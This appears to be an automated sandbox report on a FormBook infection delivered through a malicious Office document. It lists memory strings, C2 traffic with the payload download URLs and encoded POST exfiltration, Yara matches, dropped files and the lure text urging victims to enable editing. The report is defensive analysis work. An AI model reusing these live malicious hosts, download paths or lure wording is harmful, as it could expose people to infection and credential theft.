      Source: explorer.exe, 00000009.00000000.1041936992.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1297921404.0000000004385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.renelle.net
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.renelle.net/hs95/
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.renelle.net/hs95/www.songsurvivor.com
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.renelle.netReferer:
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.riders-app.store
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.riders-app.store/hs95/
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.riders-app.storeReferer:
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.songsurvivor.com
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.songsurvivor.com/hs95/
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.songsurvivor.com/hs95/www.kyinyuanwoaini1.com
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.songsurvivor.comReferer:
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trhghfghfgh.com
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trhghfghfgh.com/hs95/
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trhghfghfgh.com/hs95/www.riders-app.store
      Source: explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trhghfghfgh.comReferer:
      Source: explorer.exe, 00000009.00000000.1039427835.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: explorer.exe, 00000009.00000002.1293516891.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1036937262.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
      Source: explorer.exe, 00000009.00000002.1293516891.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1036937262.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
      Source: explorer.exe, 00000009.00000002.1293516891.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1036937262.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
      Source: explorer.exe, 00000009.00000002.1306188239.000000000C2FF000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.orbit4dads.com/hs95/?3fq=xw7PVRuINTi6KhkfIPSvnkLROuDczzMqojET/rvGnYC4wzzl
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C7C3C92C-1140-4E43-A415-F39DE2B8E989}.tmpJump to behavior
      Source: unknownDNS traffic detected: queries for: unesa.me
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_035F061D URLDownloadToFileW,ShellExecuteW,ExitProcess,5_2_035F061D
      Source: global trafficHTTP traffic detected: GET /oaeopb HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: unesa.meConnection: Keep-AliveCookie: PHPSESSID=ocdj0ilvspb72uvs25f9qm9n1n
      Source: global trafficHTTP traffic detected: GET /we/wewewewewewewewew%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23ewewewewewewe.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: 15.223.2.12
      Source: global trafficHTTP traffic detected: GET /102/cleanmgr.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 15.223.2.12Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /hs95/?3fq=nMb/sedmpeBr7+ghqSOwC1xbmX5P5zzgM9CDx9I+q0VFP3WV4QSSvpToeK8jsn7ZNXtM7Q==&MJELdT=OHKPl0&sql=1 HTTP/1.1Host: www.folado.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hs95/?3fq=7/SnWjC4QSLaRnvMg83QdIn7p4XRRaufQw3ayVgZFyp+C6x9joVaVP2qVgz+otvkZ3B/aw==&MJELdT=OHKPl0&sql=1 HTTP/1.1Host: www.cell-phones-0406-da-sa-fb.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hs95/?3fq=xw7PVRuINTi6KhkfIPSvnkLROuDczzMqojET/rvGnYC4wzzl+Hl3kcfMygwQj+X1OmQGQg==&MJELdT=OHKPl0&sql=1 HTTP/1.1Host: www.orbit4dads.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49185 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49187 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49189
      Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49182 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49187
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49186
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49185
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49184
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
      Source: unknownNetwork traffic detected: HTTP traffic on port 49189 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49182
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49192
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49191
      Source: unknownNetwork traffic detected: HTTP traffic on port 49192 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49191 -> 443
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 13 Jun 2023 09:02:16 GMTContent-Type: text/htmlContent-Length: 291Connection: closeServer: openrestyETag: "6463c432-123"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: unknownTCP traffic detected without corresponding DNS query: 15.223.2.12
      Source: EQNEDT32.EXE, 00000005.00000002.1028643416.0000000000994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
      Source: explorer.exe, 00000009.00000000.1039427835.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: EQNEDT32.EXE, 00000005.00000002.1028643416.0000000000994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
      Source: unknownHTTP traffic detected: POST /hs95/ HTTP/1.1Host: www.folado.comConnection: closeContent-Length: 2149Cache-Control: no-cacheOrigin: http://www.folado.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.folado.com/hs95/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 71 3d 76 75 58 46 79 2d 77 55 74 65 55 51 72 2d 64 7a 7e 69 37 55 58 6c 55 30 75 55 55 44 34 43 33 72 58 49 43 54 32 70 41 54 6a 78 56 66 44 79 71 75 37 43 71 59 30 34 44 6e 46 73 63 44 70 6b 54 31 42 57 52 5a 35 6a 57 74 4a 69 59 59 50 74 64 70 73 4c 46 5f 79 73 73 58 67 59 34 30 6f 6e 31 4f 6f 6f 6f 33 51 42 47 44 77 54 7a 61 76 7a 74 70 47 44 67 47 6a 36 79 45 36 33 50 44 62 46 68 57 4d 6c 63 48 33 66 47 4a 59 61 66 5f 54 4e 28 42 74 59 65 53 70 30 76 53 47 54 42 61 54 79 4f 6c 79 54 31 57 6c 2d 4a 65 49 68 49 43 32 52 32 63 37 2d 46 48 65 75 62 69 59 42 74 6f 75 66 36 59 32 7a 65 69 56 6c 64 4c 63 42 4d 7a 41 70 68 46 68 49 77 2d 6d 75 7e 68 76 52 66 5f 30 50 57 42 31 53 50 58 70 32 4e 35 41 64 45 56 49 32 76 46 36 6a 56 79 52 79 35 4e 7a 4f 36 62 7a 55 4e 51 45 35 48 78 28 59 28 72 36 5f 68 42 7a 37 6d 57 69 6d 57 38 39 55 6a 50 43 52 55 69 76 71 70 5a 76 6a 71 70 6d 6a 52 56 6b 45 72 49 64 78 32 49 39 57 5a 7a 36 56 36 64 32 68 65 32 52 6f 79 72 4d 52 62 4b 58 6c 30 58 7e 77 6b 78 6d 76 61 44 59 2d 55 44 6b 32 42 34 37 37 67 42 58 34 65 66 5a 70 68 44 69 6a 57 6e 6a 6b 41 77 38 34 32 74 76 48 72 72 55 4a 72 34 66 48 39 5f 43 43 72 70 6d 6e 38 70 6b 64 64 31 36 59 49 36 78 6c 68 79 65 6a 6f 4d 68 66 47 54 72 69 4a 77 35 55 38 6d 39 65 74 61 52 68 67 39 6c 6c 6a 57 35 4e 32 73 6e 47 33 6d 69 39 6f 6f 57 63 52 6d 64 46 4e 71 30 75 75 72 70 55 72 62 5a 2d 39 6a 43 55 68 6b 36 36 54 4a 78 2d 71 33 68 78 43 57 58 75 42 64 69 7a 65 58 7e 63 6b 61 57 63 31 71 68 66 4c 41 41 64 48 38 44 35 39 48 37 6e 38 63 50 36 4d 30 75 4b 45 51 31 44 43 52 59 76 38 57 4d 35 43 6c 64 34 58 39 69 77 41 71 56 57 76 65 63 66 37 56 67 6a 41 48 55 32 43 35 69 30 7a 4a 59 36 31 57 49 53 4e 42 59 4d 30 30 77 4d 37 36 54 31 4e 30 7e 66 76 55 34 6e 36 73 4e 75 28 67 44 70 4a 79 6d 36 34 41 75 4f 70 58 45 7a 38 58 63 46 50 4e 47 6a 73 6a 6b 67 7a 54 62 32 48 77 71 68 58 63 59 62 77 54 4c 33 31 43 28 47 59 34 6b 32 33 68 37 68 69 62 54 79 7a 46 6d 54 79 4e 56 59 6f 37 71 64 64 48 4c 6c 34 73 34 41 68 49 65 72 4a 41 73 44 4c 49 74 38 49 4c 36 5a 53 61 7a 78 48 59 51 5a 70 46 7e 50 71 44 69 34 78 61 32 54 41 57 67 49 5a 31 72 72 74 6d 6e 2d 68 50 52 73 57 67 57 39 6b 45 62 65 6e 51 30 2d 6f 59 47 6b 4b 6f 78 65 4d 64 43 58 39 32 4d 74 77 35 61 33 46 36 4a 47 50 65 65 58 28 4b 35 36 67 66 74 75 75 52 76 47 37 35 56 67 53 53 46 35 6b 38 62 49 4d 39 41 4b 4e 63 55 52 58 56 48 58 37 31 7e 65 55 37 75 54 36 6d 77 6a 78 73 43 45 38 56 72 6b 67 33 52 4f 7a 45 73 6c 68 62 38 77 35 39 37 6b 59 50 4f 4a 68 67 65 77 57 4e 39 76 6e 62 6d 77 32 72 32 69 56 56 71 4c 71 33 76 48 32 47 67 36 79 30 39
      Source: unknownHTTPS traffic detected: 103.242.124.88:443 -> 192.168.2.22:49181 version: TLS 1.2

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000A.00000002.1293431078.00000000001F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.1293276681.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.1114237135.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.1293480956.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1038091182.0000000012B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.1056144185.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Detected FormBook malware
      Source: C:\Windows\SysWOW64\cmmon32.exeDropped file: C:\Users\user\AppData\Roaming\4163BP8B\416logri.iniJump to dropped file
      Source: C:\Windows\SysWOW64\cmmon32.exeDropped file: C:\Users\user\AppData\Roaming\4163BP8B\416logrv.iniJump to dropped file
      Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exeDropped file: C:\Users\user\AppData\Roaming\4163BP8B\416logrf.iniJump to dropped file
      Malicious sample detected (through community Yara rule)
      Source: 0000000A.00000002.1293431078.00000000001F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.1293431078.00000000001F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.1293431078.00000000001F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000A.00000002.1293276681.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.1293276681.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.1293276681.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.1114237135.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000B.00000002.1114237135.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.1114237135.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000A.00000002.1293480956.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.1293480956.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.1293480956.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000009.00000002.1305552060.000000000B328000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
      Source: 00000007.00000002.1038091182.0000000012B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000007.00000002.1038091182.0000000012B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000007.00000002.1038091182.0000000012B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.1056144185.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000008.00000002.1056144185.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.1056144185.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: Process Memory Space: cleanmgr_settings.exe PID: 3332, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: RegSvcs.exe PID: 3388, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: cmmon32.exe PID: 3440, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\wewewewewewewewew##################ewewewewewewe[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74697CD7.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
      Source: Document image extraction number: 0Screenshot OCR: Enable Editing" from the yellow bar above Once you have enabled 3 editing, please click "Enable
      Source: Document image extraction number: 0Screenshot OCR: document is protected r Open the document in Microsoft Office. 1 Previewing online is not avail
      Source: Document image extraction number: 0Screenshot OCR: protected documents If this document was downloaded from your 2 email, please click "Enable Edit
      Source: Document image extraction number: 0Screenshot OCR: Enable Content" from the yellow bar above Em ~ m mm
      Source: Document image extraction number: 1Screenshot OCR: document is protected Cpim axumm qn Mkmdtof&e 1 ~NM9 oMjne wmcwd c$ocvmcntb If EMS document wn
      Office equation editor drops PE file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\cleanmgr[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\cleanmgr_settings.exeJump to dropped file
      Source: C:\Users\Public\cleanmgr_settings.exeCode function: 7_2_000007FE88C67D197_2_000007FE88C67D19
      Source: C:\Users\Public\cleanmgr_settings.exeCode function: 7_2_000007FE88C675657_2_000007FE88C67565
      Source: C:\Users\Public\cleanmgr_settings.exeCode function: 7_2_000007FE88C606987_2_000007FE88C60698
      Source: C:\Users\Public\cleanmgr_settings.exeCode function: 7_2_000007FE88C6062D7_2_000007FE88C6062D
      Source: C:\Users\Public\cleanmgr_settings.exeCode function: 7_2_000007FE88C606A07_2_000007FE88C606A0
      Source: C:\Users\Public\cleanmgr_settings.exeCode function: 7_2_000007FE88C606A87_2_000007FE88C606A8
      Source: C:\Users\Public\cleanmgr_settings.exeCode function: 7_2_000007FE88C606B07_2_000007FE88C606B0
      Source: C:\Users\Public\cleanmgr_settings.exeCode function: 7_2_000007FE88C6F2487_2_000007FE88C6F248
      Source: C:\Users\Public\cleanmgr_settings.exeCode function: 7_2_000007FE88C606607_2_000007FE88C60660
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0086E0C68_2_0086E0C6
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089D0058_2_0089D005
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008730408_2_00873040
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0088905A8_2_0088905A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008ED06D8_2_008ED06D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0086E2E98_2_0086E2E9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009112388_2_00911238
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009163BF8_2_009163BF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0086F3CF8_2_0086F3CF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008963DB8_2_008963DB
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008723058_2_00872305
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008773538_2_00877353
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008BA37B8_2_008BA37B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008814898_2_00881489
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008A54858_2_008A5485
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008F443E8_2_008F443E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008AD47D8_2_008AD47D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008F05E38_2_008F05E3
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0088C5F08_2_0088C5F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0087351F8_2_0087351F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008B65408_2_008B6540
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008746808_2_00874680
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0087E6C18_2_0087E6C1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009126228_2_00912622
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008BA6348_2_008BA634
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008F579A8_2_008F579A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0087C7BC8_2_0087C7BC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008A57C38_2_008A57C3
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008EF8C48_2_008EF8C4
